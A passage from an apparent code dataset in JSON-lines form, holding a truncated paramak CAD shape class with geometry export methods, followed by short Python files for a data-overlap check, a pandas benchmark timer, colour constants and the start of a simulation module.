msg = \"individual points must be a list or a tuple.\" + \\\n \"{} in of type {}\".format(value, type(value))\n raise ValueError(msg)\n\n for value in values:\n # Checks that the length of each tuple in points is 2 or 3\n if len(value) not in [2, 3]:\n msg = \"individual points contain 2 or 3 entries {} has a \\\n length of {}\".format(value, len(values[0]))\n raise ValueError(msg)\n\n # Checks that the XY points are numbers\n if not isinstance(value[0], numbers.Number):\n msg = \"The first value in the tuples that make \\\n up the points represents the X value \\\n and must be a number {}\".format(value)\n raise ValueError(msg)\n if not isinstance(value[1], numbers.Number):\n msg = \"The second value in the tuples that make \\\n up the points represents the X value \\\n and must be a number {}\".format(value)\n raise ValueError(msg)\n\n # Checks that only straight and spline are in the connections\n # part of points\n if len(value) == 3:\n if value[2] not in [\"straight\", \"spline\", \"circle\"]:\n msg = 'individual connections must be either \\\n \"straight\", \"circle\" or \"spline\"'\n raise ValueError(msg)\n\n # checks that the entries in the points are either all 2 long or\n # all 3 long, not a mixture\n if not all(len(entry) == 2 for entry in values):\n if not all(len(entry) == 3 for entry in values):\n msg = \"The points list should contain entries of length 2 \\\n or 3 but not a mixture of 2 and 3\"\n raise ValueError(msg)\n\n if len(values) > 1:\n if values[0][:2] == values[-1][:2]:\n msg = \"The coordinates of the last and first points are \\\n the same.\"\n raise ValueError(msg)\n\n values.append(values[0])\n\n self._points = values\n\n @property\n def stp_filename(self):\n \"\"\"Sets the Shape.stp_filename attribute which is used as the filename\n when exporting the geometry to stp format. Note, .stp will be added to\n filenames not ending with .step or .stp.\n\n Args:\n value (str): the value to use as the stp_filename\n\n Raises:\n incorrect type: only str values are accepted\n \"\"\"\n\n return self._stp_filename\n\n @stp_filename.setter\n def stp_filename(self, value):\n if value is not None:\n if isinstance(value, str):\n if Path(value).suffix not in [\".stp\", \".step\"]:\n msg = \"Incorrect filename ending, filename must end with \\\n .stp or .step\"\n raise ValueError(msg)\n else:\n msg = \"stp_filename must be a \\\n string {} {}\".format(value, type(value))\n raise ValueError(msg)\n self._stp_filename = value\n\n @property\n def stl_filename(self):\n \"\"\"Sets the Shape.stl_filename attribute which is used as the filename\n when exporting the geometry to stl format. 
Note .stl will be added to\n filenames not ending with .stl\n\n Args:\n value (str): the value to use as the stl_filename\n\n Raises:\n incorrect type: only str values are accepted\n \"\"\"\n return self._stl_filename\n\n @stl_filename.setter\n def stl_filename(self, value):\n if value is not None:\n if isinstance(value, str):\n if Path(value).suffix != \".stl\":\n msg = \"Incorrect filename ending, filename must end with \\\n .stl\"\n raise ValueError(msg)\n else:\n msg = \"stl_filename must be a string \\\n {} {}\".format(value, type(value))\n raise ValueError(msg)\n self._stl_filename = value\n\n @property\n def azimuth_placement_angle(self):\n return self._azimuth_placement_angle\n\n @azimuth_placement_angle.setter\n def azimuth_placement_angle(self, value):\n error = False\n if isinstance(value, (int, float, Iterable)) and \\\n not isinstance(value, str):\n if isinstance(value, Iterable):\n for i in value:\n if not isinstance(i, (int, float)):\n error = True\n else:\n error = True\n\n if error:\n msg = \"azimuth_placement_angle must be a float or list of floats\"\n raise ValueError(msg)\n self._azimuth_placement_angle = value\n\n def create_solid(self) -> cq.Workplane:\n solid = None\n if self.points is not None:\n # obtains the first two values of the points list\n XZ_points = [(p[0], p[1]) for p in self.points]\n\n for point in self.points:\n if len(point) != 3:\n msg = \"The points list should contain two coordinates and \\\n a connetion type\"\n raise ValueError(msg)\n\n # obtains the last values of the points list\n connections = [p[2] for p in self.points[:-1]]\n\n current_linetype = connections[0]\n current_points_list = []\n instructions = []\n # groups together common connection types\n for i, connection in enumerate(connections):\n if connection == current_linetype:\n current_points_list.append(XZ_points[i])\n else:\n current_points_list.append(XZ_points[i])\n instructions.append(\n {current_linetype: current_points_list})\n current_linetype = connection\n current_points_list = [XZ_points[i]]\n instructions.append({current_linetype: current_points_list})\n\n if list(instructions[-1].values())[0][-1] != XZ_points[0]:\n keyname = list(instructions[-1].keys())[0]\n instructions[-1][keyname].append(XZ_points[0])\n\n if hasattr(self, \"path_points\"):\n\n factor = 1\n if self.workplane in [\"XZ\", \"YX\", \"ZY\"]:\n factor *= -1\n\n solid = cq.Workplane(self.workplane).center(0, 0)\n\n if self.force_cross_section:\n for point in self.path_points[:-1]:\n solid = solid.workplane(offset=point[1] * factor).\\\n center(point[0], 0).workplane()\n for entry in instructions:\n if list(entry.keys())[0] == \"spline\":\n solid = solid.spline(\n listOfXYTuple=list(entry.values())[0])\n if list(entry.keys())[0] == \"straight\":\n solid = solid.polyline(list(entry.values())[0])\n if list(entry.keys())[0] == \"circle\":\n p0, p1, p2 = list(entry.values())[0][:3]\n solid = solid.moveTo(p0[0], p0[1]).\\\n threePointArc(p1, p2)\n solid = solid.close()\n solid = solid.center(-point[0], 0).\\\n workplane(offset=-point[1] * factor)\n\n elif self.force_cross_section == False:\n solid = solid.workplane(\n offset=self.path_points[0][1] *\n factor).center(\n self.path_points[0][0],\n 0).workplane()\n for entry in instructions:\n if list(entry.keys())[0] == \"spline\":\n solid = solid.spline(\n listOfXYTuple=list(entry.values())[0])\n if list(entry.keys())[0] == \"straight\":\n solid = solid.polyline(list(entry.values())[0])\n if list(entry.keys())[0] == \"circle\":\n p0 = list(entry.values())[0][0]\n p1 
= list(entry.values())[0][1]\n p2 = list(entry.values())[0][2]\n solid = solid.moveTo(\n p0[0], p0[1]).threePointArc(\n p1, p2)\n\n solid = solid.close().center(0, 0).\\\n center(-self.path_points[0][0], 0).\\\n workplane(offset=-self.path_points[0][1] * factor)\n\n solid = solid.workplane(offset=self.path_points[-1][1] * factor).\\\n center(self.path_points[-1][0], 0).workplane()\n\n else:\n # for rotate and extrude shapes\n solid = cq.Workplane(self.workplane)\n # for extrude shapes\n if hasattr(self, \"extrusion_start_offset\"):\n extrusion_offset = -self.extrusion_start_offset\n solid = solid.workplane(offset=extrusion_offset)\n\n for entry in instructions:\n if list(entry.keys())[0] == \"spline\":\n solid = solid.spline(listOfXYTuple=list(entry.values())[0])\n if list(entry.keys())[0] == \"straight\":\n solid = solid.polyline(list(entry.values())[0])\n if list(entry.keys())[0] == \"circle\":\n p0 = list(entry.values())[0][0]\n p1 = list(entry.values())[0][1]\n p2 = list(entry.values())[0][2]\n solid = solid.moveTo(p0[0], p0[1]).threePointArc(p1, p2)\n\n return solid\n\n def rotate_solid(\n self,\n solid: Optional[cq.Workplane]) -> cq.Workplane:\n # Checks if the azimuth_placement_angle is a list of angles\n if isinstance(self.azimuth_placement_angle, Iterable):\n azimuth_placement_angles = self.azimuth_placement_angle\n else:\n azimuth_placement_angles = [self.azimuth_placement_angle]\n\n rotated_solids = []\n # Perform seperate rotations for each angle\n for angle in azimuth_placement_angles:\n rotated_solids.append(\n solid.rotate(\n *self.get_rotation_axis()[0], angle))\n solid = cq.Workplane(self.workplane)\n\n # Joins the seperate solids together\n for i in rotated_solids:\n solid = solid.union(i)\n return solid\n\n def get_rotation_axis(self):\n # TODO add return type hinting -> Tuple[List[Tuple[int, int, int],\n # Tuple[int, int, int]], str]\n \"\"\"Returns the rotation axis for a given shape. If self.rotation_axis\n is None, the rotation axis will be computed from self.workplane (or\n from self.path_workplane if applicable). If self.rotation_axis is an\n acceptable string (eg. \"X\", \"+Y\", \"-Z\"...) then this axis will be used.\n If self.rotation_axis is a list of two points, then these two points\n will be used to form an axis.\n\n Returns:\n list, str: list of two XYZ points and the string of the axis (eg.\n \"X\", \"Y\"..)\n \"\"\"\n rotation_axis = {\n \"X\": [(-1, 0, 0), (1, 0, 0)],\n \"-X\": [(1, 0, 0), (-1, 0, 0)],\n \"Y\": [(0, -1, 0), (0, 1, 0)],\n \"-Y\": [(0, 1, 0), (0, -1, 0)],\n \"Z\": [(0, 0, -1), (0, 0, 1)],\n \"-Z\": [(0, 0, 1), (0, 0, -1)],\n }\n if isinstance(self.rotation_axis, str):\n # X, Y or Z axis\n return (\n rotation_axis[self.rotation_axis.replace(\"+\", \"\")],\n self.rotation_axis\n )\n elif isinstance(self.rotation_axis, Iterable):\n # Custom axis\n return self.rotation_axis, \"custom_axis\"\n elif self.rotation_axis is None:\n # Axis from workplane or path_workplane\n if hasattr(self, \"path_workplane\"):\n # compute from path_workplane instead\n workplane = self.path_workplane\n else:\n workplane = self.workplane\n return rotation_axis[workplane[1]], workplane[1]\n\n def create_limits(self) -> Tuple[float, float, float, float]:\n \"\"\"Finds the x,y,z limits (min and max) of the points that make up the\n face of the shape. 
Note the Shape may extend beyond this boundary if\n        splines are used to connect points.\n\n        Raises:\n            ValueError: if no points are defined\n\n        Returns:\n            float, float, float, float: x_minimum, x_maximum,\n            z_minimum, z_maximum (y limits are not computed)\n        \"\"\"\n\n        if hasattr(self, \"find_points\"):\n            self.find_points()\n        if self.points is None:\n            raise ValueError(\"No points defined for\", self)\n\n        self.x_min = float(min([row[0] for row in self.points]))\n        self.x_max = float(max([row[0] for row in self.points]))\n\n        self.z_min = float(min([row[1] for row in self.points]))\n        self.z_max = float(max([row[1] for row in self.points]))\n\n        return self.x_min, self.x_max, self.z_min, self.z_max\n\n    def export_stl(\n            self,\n            filename: str,\n            tolerance: Optional[float] = 0.001,\n            angular_tolerance: Optional[float] = 0.1) -> str:\n        \"\"\"Exports an stl file for the Shape.solid. If the provided filename\n        doesn't end with .stl it will be added\n\n        Args:\n            filename: the filename of the stl file to be exported\n            tolerance: the deflection tolerance of the faceting\n            angular_tolerance: the angular tolerance, in radians\n        \"\"\"\n\n        path_filename = Path(filename)\n\n        if path_filename.suffix != \".stl\":\n            path_filename = path_filename.with_suffix(\".stl\")\n\n        path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n\n        exporters.export(self.solid, str(path_filename), exportType='STL',\n                         tolerance=tolerance,\n                         angularTolerance=angular_tolerance)\n\n        print(\"Saved file as \", path_filename)\n\n        return str(path_filename)\n\n    def export_stp(\n            self,\n            filename: Optional[str] = None,\n            units: Optional[str] = 'mm',\n            mode: Optional[str] = 'solid') -> str:\n        \"\"\"Exports an stp file for the Shape.solid. If the filename provided\n        doesn't end with .stp or .step then .stp will be added. If a\n        filename is not provided and the shape's stp_filename property is\n        not None the stp_filename will be used as the export filename.\n\n        Args:\n            filename (str): the filename of the stp\n            units (str): the units of the stp file, options are 'cm' or 'mm'.\n                Default is mm.\n            mode (str, optional): the object to export can be either\n                'solid' which exports 3D solid shapes or the 'wire' which\n                exports the wire edges of the shape. Defaults to 'solid'.\n        \"\"\"\n\n        if filename is not None:\n            path_filename = Path(filename)\n\n            if path_filename.suffix not in [\".stp\", \".step\"]:\n                path_filename = path_filename.with_suffix(\".stp\")\n\n            path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n        elif self.stp_filename is not None:\n            path_filename = Path(self.stp_filename)\n\n        if mode == 'solid':\n            exporters.export(self.solid, str(path_filename), exportType='STEP')\n        elif mode == 'wire':\n            exporters.export(self.wire, str(path_filename), exportType='STEP')\n        else:\n            raise ValueError(\"The mode argument for export_stp \\\n                only accepts 'solid' or 'wire'\", self)\n\n        if units == 'cm':\n            _replace(\n                path_filename,\n                'SI_UNIT(.MILLI.,.METRE.)',\n                'SI_UNIT(.CENTI.,.METRE.)')\n\n        print(\"Saved file as \", path_filename)\n\n        return str(path_filename)\n\n    def export_physical_groups(self, filename: str) -> str:\n        \"\"\"Exports a JSON file containing a look-up table which is useful for\n        identifying faces and volumes. 
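# export_stl and export_stp above share the same pathlib idiom: normalise the
# suffix with Path.with_suffix, then create the parent directories before
# writing. A minimal standalone sketch of that pattern; the helper name
# (prepare_export_path) is hypothetical, not paramak API.
from pathlib import Path

def prepare_export_path(filename, suffixes=(".stl",)):
    """Returns a Path ending in an accepted suffix, with parent dirs created."""
    path = Path(filename)
    if path.suffix not in suffixes:
        # with_suffix replaces any existing suffix rather than appending to it
        path = path.with_suffix(suffixes[0])
    path.parents[0].mkdir(parents=True, exist_ok=True)
    return path

print(prepare_export_path("out/shape.step", suffixes=(".stp", ".step")))  # out/shape.step
print(prepare_export_path("out/shape.txt", suffixes=(".stp", ".step")))   # out/shape.stp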
If filename provided doesn't end with\n        .json then .json will be added.\n\n        Args:\n            filename (str): the filename used to save the json file\n        \"\"\"\n\n        path_filename = Path(filename)\n\n        if path_filename.suffix != \".json\":\n            path_filename = path_filename.with_suffix(\".json\")\n\n        path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n        if self.physical_groups is not None:\n            # write to the normalised path so the .json suffix is guaranteed\n            with open(str(path_filename), \"w\") as outfile:\n                json.dump(self.physical_groups, outfile, indent=4)\n\n            print(\"Saved physical_groups description to \", path_filename)\n        else:\n            print(\n                \"Warning: physical_groups attribute is None \\\n                for {}\".format(\n                    self.name\n                )\n            )\n\n        return str(path_filename)\n\n    def export_svg(\n            self,\n            filename: Optional[str] = 'shape.svg',\n            projectionDir: Tuple[float, float, float] = (-1.75, 1.1, 5),\n            width: Optional[float] = 800,\n            height: Optional[float] = 800,\n            marginLeft: Optional[float] = 100,\n            marginTop: Optional[float] = 100,\n            strokeWidth: Optional[float] = None,\n            strokeColor: Optional[Tuple[int, int, int]] = (0, 0, 0),\n            hiddenColor: Optional[Tuple[int, int, int]] = (100, 100, 100),\n            showHidden: Optional[bool] = True,\n            showAxes: Optional[bool] = False) -> str:\n        \"\"\"Exports an svg file for the Shape.solid. If the filename provided\n        doesn't end with .svg it will be added.\n\n        Args:\n            filename: the filename of the svg file to be exported. Defaults to\n                \"shape.svg\".\n            projectionDir: The direction vector to view the geometry from\n                (x, y, z). Defaults to (-1.75, 1.1, 5)\n            width: the width of the svg image produced in pixels. Defaults to\n                800\n            height: the height of the svg image produced in pixels. Defaults to\n                800\n            marginLeft: the number of pixels between the left edge of the image\n                and the start of the geometry.\n            marginTop: the number of pixels between the top edge of the image\n                and the start of the geometry.\n            strokeWidth: the width of the lines used to draw the geometry.\n                Defaults to None which automatically selects a suitable width.\n            strokeColor: the color of the lines used to draw the geometry in\n                RGB format with each value between 0 and 255. Defaults to\n                (0, 0, 0) which is black.\n            hiddenColor: the color of the lines used to draw the hidden edges\n                of the geometry in RGB format with each value between 0 and\n                255. Defaults to (100, 100, 100) which is light grey.\n            showHidden: If the edges obscured by geometry should be included in\n                the diagram. 
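# export_physical_groups above writes its face/volume look-up table with
# json.dump; using the normalised path (rather than the raw filename argument)
# is what keeps the .json suffix guarantee. A short self-contained sketch of
# that pattern; the group data here is made up for illustration.
import json
from pathlib import Path

physical_groups = {"faces": {"1": "front"}, "volumes": {"1": "body"}}
path = Path("manifest").with_suffix(".json")  # -> manifest.json
with open(path, "w") as outfile:
    json.dump(physical_groups, outfile, indent=4)
print("wrote", path)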
Defaults to True.\n            showAxes: If the x, y, z axis should be included in the image.\n                Defaults to False.\n\n        Returns:\n            str: the svg filename created\n        \"\"\"\n\n        path_filename = Path(filename)\n\n        if path_filename.suffix != \".svg\":\n            path_filename = path_filename.with_suffix(\".svg\")\n\n        path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n\n        opt = {\n            \"width\": width,\n            \"height\": height,\n            \"marginLeft\": marginLeft,\n            \"marginTop\": marginTop,\n            \"showAxes\": showAxes,\n            \"projectionDir\": projectionDir,\n            \"strokeColor\": strokeColor,\n            \"hiddenColor\": hiddenColor,\n            \"showHidden\": showHidden\n        }\n\n        if strokeWidth is not None:\n            opt[\"strokeWidth\"] = strokeWidth\n\n        exporters.export(self.solid, str(path_filename), exportType='SVG',\n                         opt=opt)\n\n        print(\"Saved file as \", path_filename)\n\n        return str(path_filename)\n\n    def export_html(\n        self,\n        filename: Optional[str] = \"shape.html\",\n        facet_splines: Optional[bool] = True,\n        facet_circles: Optional[bool] = True,\n        tolerance: Optional[float] = 1e-3,\n        view_plane: Optional[str] = None,\n    ):\n        \"\"\"Creates an html graph representation of the points and connections\n        for the Shape object. Shapes are colored by their .color property.\n        Shapes are also labelled by their .name. If filename provided doesn't\n        end with .html then .html will be added.\n\n        Args:\n            filename: the filename used to save the html graph. Defaults to\n                shape.html\n            facet_splines: If True then spline edges will be faceted. Defaults\n                to True.\n            facet_circles: If True then circle edges will be faceted. Defaults\n                to True.\n            tolerance: faceting tolerance to use when faceting circles and\n                splines. Defaults to 1e-3.\n            view_plane: The plane to project to. Defaults to the workplane of\n                the paramak.Shape\n\n        Returns:\n            plotly.Figure(): figure object\n        \"\"\"\n\n        # if view plane is not set then use the shape workplane\n        if view_plane is None:\n            view_plane = self.workplane\n\n        if self.points is None:\n            if hasattr(self, 'path_points') and self.path_points is None:\n                raise ValueError(\"No points or path_points defined for\", self)\n\n        if self.wire is None:\n            raise ValueError(\"No wire defined for\", self)\n\n        if not isinstance(self.wire, list):\n            list_of_wires = [self.wire]\n        else:\n            list_of_wires = self.wire\n\n        fig = paramak.utils.export_wire_to_html(\n            wires=list_of_wires,\n            filename=filename,\n            view_plane=view_plane,\n            facet_splines=facet_splines,\n            facet_circles=facet_circles,\n            tolerance=tolerance,\n            title=\"coordinates of \" + self.__class__.__name__ +\n            \" shape, viewed from the \" + view_plane + \" plane\",\n        )\n\n        if self.points is not None:\n            fig.add_trace(\n                plotly_trace(\n                    points=self.points,\n                    mode=\"markers\",\n                    name='Shape.points'\n                )\n            )\n\n        # sweep shapes have .path_points but not .points attribute\n        if hasattr(self, 'path_points'):\n            fig.add_trace(\n                plotly_trace(\n                    points=self.path_points,\n                    mode=\"markers\",\n                    name='Shape.path_points'\n                )\n            )\n\n        return fig\n\n    def export_2d_image(\n            self,\n            filename: Optional[str] = 'shape.png',\n            xmin: Optional[float] = 0.,\n            xmax: Optional[float] = 900.,\n            ymin: Optional[float] = -600.,\n            ymax: Optional[float] = 600.):\n        \"\"\"Exports a 2d image (png) of the shape. Components are colored by\n        their Shape.color property. 
If filename provided doesn't end with .png\n        then .png will be added.\n\n        Args:\n            filename (str): the filename of the saved png image.\n            xmin (float, optional): the minimum x value of the x axis.\n                Defaults to 0.\n            xmax (float, optional): the maximum x value of the x axis.\n                Defaults to 900.\n            ymin (float, optional): the minimum y value of the y axis.\n                Defaults to -600.\n            ymax (float, optional): the maximum y value of the y axis.\n                Defaults to 600.\n\n        Returns:\n            matplotlib.pyplot: the pyplot module, after the image is saved\n        \"\"\"\n\n        fig, ax = plt.subplots()\n\n        patch = self._create_patch()\n\n        ax.add_collection(patch)\n\n        ax.axis(\"equal\")\n        ax.set(xlim=(xmin, xmax), ylim=(ymin, ymax))\n        ax.set_aspect(\"equal\", \"box\")\n\n        plt.savefig(filename, dpi=100)\n        plt.close()\n        print(\"\\n           saved 2d image to \", filename)\n\n        return plt\n\n    def _create_patch(self):\n        \"\"\"Creates a matplotlib polygon patch from the Shape points. This is\n        used when making 2d images of the Shape object.\n\n        Raises:\n            ValueError: No points defined for the Shape\n\n        Returns:\n            Matplotlib object patch: a plottable polygon shape\n        \"\"\"\n\n        if self.points is None:\n            raise ValueError(\"No points defined for\", self)\n\n        patches = []\n\n        edges = facet_wire(\n            wire=self.wire,\n            facet_splines=True,\n            facet_circles=True)\n\n        fpoints = []\n        for edge in edges:\n            for vertex in edge.Vertices():\n                fpoints.append((vertex.X, vertex.Z))\n\n        polygon = Polygon(fpoints, closed=True)\n        patches.append(polygon)\n\n        patch = PatchCollection(patches)\n\n        if self.color is not None:\n            patch.set_facecolor(self.color)\n            patch.set_color(self.color)\n            patch.color = self.color\n            patch.edgecolor = self.color\n            # checks to see if an alpha value is provided in the color\n            if len(self.color) == 4:\n                patch.set_alpha(self.color[-1])\n        self.patch = patch\n        return patch\n\n    def neutronics_description(self) -> dict:\n        \"\"\"Returns a neutronics description of the Shape object. This is needed\n        for use with automated neutronics model methods which require\n        linkage between the stp files and materials. 
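# _create_patch above builds a matplotlib PatchCollection from faceted wire
# points. A self-contained sketch of the same idea with made-up polygon
# points, including the set_alpha() call (it is a method on the collection,
# not an attribute, which is why the original assignment form was a bug):
import matplotlib
matplotlib.use("Agg")  # headless backend so the sketch runs anywhere
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection

color = (0.2, 0.4, 0.8, 0.5)  # RGBA: the last value is the alpha channel
polygon = Polygon([(0, 0), (1, 0), (1, 1)], closed=True)
patch = PatchCollection([polygon])
patch.set_facecolor(color[:3])
if len(color) == 4:
    patch.set_alpha(color[-1])

fig, ax = plt.subplots()
ax.add_collection(patch)
ax.autoscale_view()
fig.savefig("patch_demo.png", dpi=100)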
If tet meshing of the\n        volume is required then Trelis meshing commands can be optionally\n        specified as the tet_mesh argument.\n\n        Returns:\n            dictionary: a dictionary of the step filename and material name\n        \"\"\"\n\n        neutronics_description = {\"material\": self.material_tag}\n\n        if self.stp_filename is not None:\n            neutronics_description[\"stp_filename\"] = self.stp_filename\n            # this is needed as ppp looks for the filename key\n            neutronics_description[\"filename\"] = self.stp_filename\n\n        if self.tet_mesh is not None:\n            neutronics_description[\"tet_mesh\"] = self.tet_mesh\n\n        if self.surface_reflectivity is True:\n            neutronics_description[\"surface_reflectivity\"] = self.surface_reflectivity\n\n        if self.stl_filename is not None:\n            neutronics_description[\"stl_filename\"] = self.stl_filename\n\n        return neutronics_description\n\n    def perform_boolean_operations(self, solid: cq.Workplane, **kwargs):\n        \"\"\"Performs boolean cut, intersect and union operations if shapes are\n        provided\"\"\"\n\n        # If a cut solid is provided then perform a boolean cut\n        if self.cut is not None:\n            solid = cut_solid(solid, self.cut)\n\n        # If a wedge cut is provided then perform a boolean cut\n        # Performed independently to avoid use of self.cut\n        # Prevents repetition of 'outdated' wedge cuts\n        if 'wedge_cut' in kwargs:\n            if kwargs['wedge_cut'] is not None:\n                solid = cut_solid(solid, kwargs['wedge_cut'])\n\n        # If an intersect is provided then perform a boolean intersect\n        if self.intersect is not None:\n            solid = intersect_solid(solid, self.intersect)\n\n        # If a union is provided then perform a boolean union\n        if self.union is not None:\n            solid = union_solid(solid, self.union)\n\n        return solid\n\n    def make_graveyard(\n            self,\n            graveyard_offset: Optional[int] = 100) -> cq.Workplane:\n        \"\"\"Creates a graveyard volume (bounding box) that encapsulates all\n        volumes. This is required by DAGMC when performing neutronics\n        simulations.\n\n        Args:\n            graveyard_offset (float): the offset between the largest edge of\n                the geometry and inner bounding shell created. Defaults to\n                100\n\n        Returns:\n            CadQuery solid: a shell volume that bounds the geometry, referred\n            to as a graveyard in DAGMC\n        \"\"\"\n\n        self.graveyard_offset = graveyard_offset\n\n        if self.solid is None:\n            self.create_solid()\n\n        graveyard_shape = paramak.HollowCube(\n            length=self.largest_dimension * 2 + graveyard_offset * 2,\n            name=\"Graveyard\",\n            material_tag=\"Graveyard\",\n            stp_filename=\"Graveyard.stp\",\n            stl_filename=\"Graveyard.stl\",\n        )\n\n        self.graveyard = graveyard_shape\n\n        return graveyard_shape\n\n    def export_h5m(\n            self,\n            filename: Optional[str] = 'dagmc.h5m',\n            skip_graveyard: Optional[bool] = False,\n            tolerance: Optional[float] = 0.001,\n            graveyard_offset: Optional[float] = 100) -> str:\n        \"\"\"Converts stl files into a DAGMC compatible h5m file using PyMOAB. The\n        DAGMC file produced has not been imprinted and merged unlike the other\n        supported method which uses Trelis to produce an imprinted and merged\n        DAGMC geometry. If the provided filename doesn't end with .h5m it will\n        be added\n\n        Args:\n            filename (str, optional): filename of the h5m output file.\n                Defaults to \"dagmc.h5m\".\n            skip_graveyard (boolean, optional): if True, no graveyard volume\n                is created or exported. Defaults to False.\n            tolerance (float, optional): the precision of the faceting\n                Defaults to 0.001.\n            graveyard_offset (float, optional): the offset between the largest\n                edge of the geometry and inner bounding shell created. 
Defaults\n                to 100.\n        Returns:\n            filename: output h5m filename\n        \"\"\"\n\n        path_filename = Path(filename)\n\n        if path_filename.suffix != \".h5m\":\n            path_filename = path_filename.with_suffix(\".h5m\")\n\n        path_filename.parents[0].mkdir(parents=True, exist_ok=True)\n\n        self.export_stl(self.stl_filename, tolerance=tolerance)\n\n        moab_core, moab_tags = define_moab_core_and_tags()\n\n        moab_core = add_stl_to_moab_core(\n            moab_core=moab_core,\n            surface_id=1,\n            volume_id=1,\n            material_name=self.material_tag,\n            tags=moab_tags,\n            stl_filename=self.stl_filename\n        )\n\n        if skip_graveyard is False:\n            self.make_graveyard(graveyard_offset=graveyard_offset)\n            self.graveyard.export_stl(self.graveyard.stl_filename)\n            volume_id = 2\n            surface_id = 2\n            moab_core = add_stl_to_moab_core(\n                moab_core=moab_core,\n                surface_id=surface_id,\n                volume_id=volume_id,\n                material_name=self.graveyard.material_tag,\n                tags=moab_tags,\n                stl_filename=self.graveyard.stl_filename\n            )\n\n        all_sets = moab_core.get_entities_by_handle(0)\n\n        file_set = moab_core.create_meshset()\n\n        moab_core.add_entities(file_set, all_sets)\n\n        moab_core.write_file(str(path_filename))\n\n        return str(path_filename)\n\n    def export_graveyard(\n            self,\n            graveyard_offset: Optional[float] = 100,\n            filename: Optional[str] = \"Graveyard.stp\") -> str:\n        \"\"\"Writes an stp file (CAD geometry) for the shape's graveyard. This\n        is needed for DAGMC simulations. This method also calls\n        Shape.make_graveyard with the offset.\n\n        Args:\n            filename (str): the filename for saving the stp file\n            graveyard_offset (float): the offset between the largest edge of\n                the geometry and inner bounding shell created. Defaults to\n                100\n\n        Returns:\n            str: the stp filename created\n        \"\"\"\n\n        self.make_graveyard(graveyard_offset=graveyard_offset)\n        new_filename = self.graveyard.export_stp(Path(filename))\n\n        return new_filename\n","sub_path":"paramak/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":47596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"12086991","text":"import pandas as pd\nimport json\nimport scipy.sparse as sp\nimport numpy as np\n\ndef valid(train_file, test_file):\n    train_mat = sp.dok_matrix((6040, 3952), dtype=np.float32)\n    with open(train_file) as f:\n        line = f.readline()\n        while line:\n            u, i, r = line.split('\\t')\n            u = int(u)\n            i = int(i)\n            train_mat[u, i] = 1\n            line = f.readline()\n    with open(test_file) as f:\n        line = f.readline()\n        while line:\n            u, i = line.split('\\t')\n            # convert to int so the keys match the ints stored in train_mat\n            u = int(u)\n            i = int(i)\n            if (u, i) in train_mat.keys():\n                print(u, i)\n            line = f.readline()\n\nif __name__ == \"__main__\":\n    # valid('Data/all_train_rating.txt', 'Data/all_test_rating.txt')\n    print(np.random.randint(4))","sub_path":"Code_zxy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"580719470","text":"from definitions_pandas import *\nfrom random import shuffle\nfrom timeit import timeit\nfrom sys import exit\nimport argparse\n\nparser = argparse.ArgumentParser(description = \"Time pandas benchmark\")\nparser.add_argument(\"-out\", type = str, \n    metavar = 'path', nargs = '?', default = None,\n    help = \"path to file to write results in csv format\"\n    )\nparser.add_argument(\"-iters\", type = int,\n    metavar = \"n\", nargs = '?', default = 10,\n    help = \"number of iterations for each function\")\nargs = parser.parse_args()\n\n# handle parsed command line arguments\nif args.out is not None:\n    
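# A quick self-contained check of the dok_matrix membership idiom used in
# valid() above. The keys are (row, col) tuples of ints, so the strings parsed
# from the file must be converted before the lookup can ever match:
import numpy as np
import scipy.sparse as sp

mat = sp.dok_matrix((4, 4), dtype=np.float32)
mat[1, 2] = 1
print((1, 2) in mat.keys())      # True
print(("1", "2") in mat.keys())  # False: string keys never match int keys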
# append to file\n filehandle = open(args.out, \"a\")\nelse:\n filehandle = None \niters = args.iters\n\n\ndef timeAndWrite(f, filehandle, iters):\n funcname = f.__name__\n querynumber = funcname[1:]\n # timeit returns time in seconds, we want milliseconds\n time = (1000.0 * timeit(f, number = iters)) / iters\n # we don't care about measuring memory for pandas\n msg = \"fintime,pandas,\" + str(iters) + \",\" + querynumber + \",\" + str(time) + \",NA\\n\"\n if filehandle == None:\n print(msg)\n else:\n filehandle.write(msg)\n\n\nfunctions = [ q0, q1, q2, q3, q4, q5, q6, q7, q8, q9 ]\nshuffle(functions) # randomize their execution order\n\n# run and time each function, write to path if provided\nfor functionName in functions:\n timeAndWrite(functionName, filehandle, iters)\n\n# clean up\nif filehandle != None:\n filehandle.close()\n\nexit()\n \n\n \n\n\n","sub_path":"src/benchmark/fintime/src/experiments/run_pandas.py","file_name":"run_pandas.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"124444648","text":"\"\"\"\ncolor\n\npart of hwpy: an OO hardware interface library\n\nhome: https://www.github.com/wovo/hwpy\n\"\"\"\n\nclass color:\n def __init__( self, red : int, green : int, blue : int ):\n self.red = red\n self.green = green\n self.blue = blue\n\nblack = color( 0, 0, 0 )\nwhite = color( 0xFF, 0xFF, 0xFF )\nred = color( 0xFF, 0, 0 ) \ngreen = color( 0, 0xFF, 0 )\nblue = color( 0, 0, 0xFF )\ngray = color( 0x80, 0x80, 0x80 )\nyellow = color( 0xFF, 0xFF, 0 )\ncyan = color( 0, 0xFF, 0xFF )\nmagenta = color( 0xFF, 0, 0xFF )\n \nviolet = color( 0xEE, 0x82, 0xEE ) \nsienna = color( 0xA0, 0x52, 0x2D ) \npurple = color( 0x80, 0x00, 0x80 ) \npink = color( 0xFF, 0xC8, 0xCB ) \nsilver = color( 0xC0, 0xC0, 0xC0 ) \nbrown = color( 0xA5, 0x2A, 0x2A ) \nsalmon = color( 0xFA, 0x80, 0x72 )\n\n\n","sub_path":"hwpy_modules/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"64593695","text":"import logging\nfrom typing import Callable\n\nfrom smart_intervention.geolocation.location import Location\nfrom smart_intervention.globals import notifications, CityMap\nfrom smart_intervention.geolocation.geolocated_actor import GeolocatedActor\nfrom 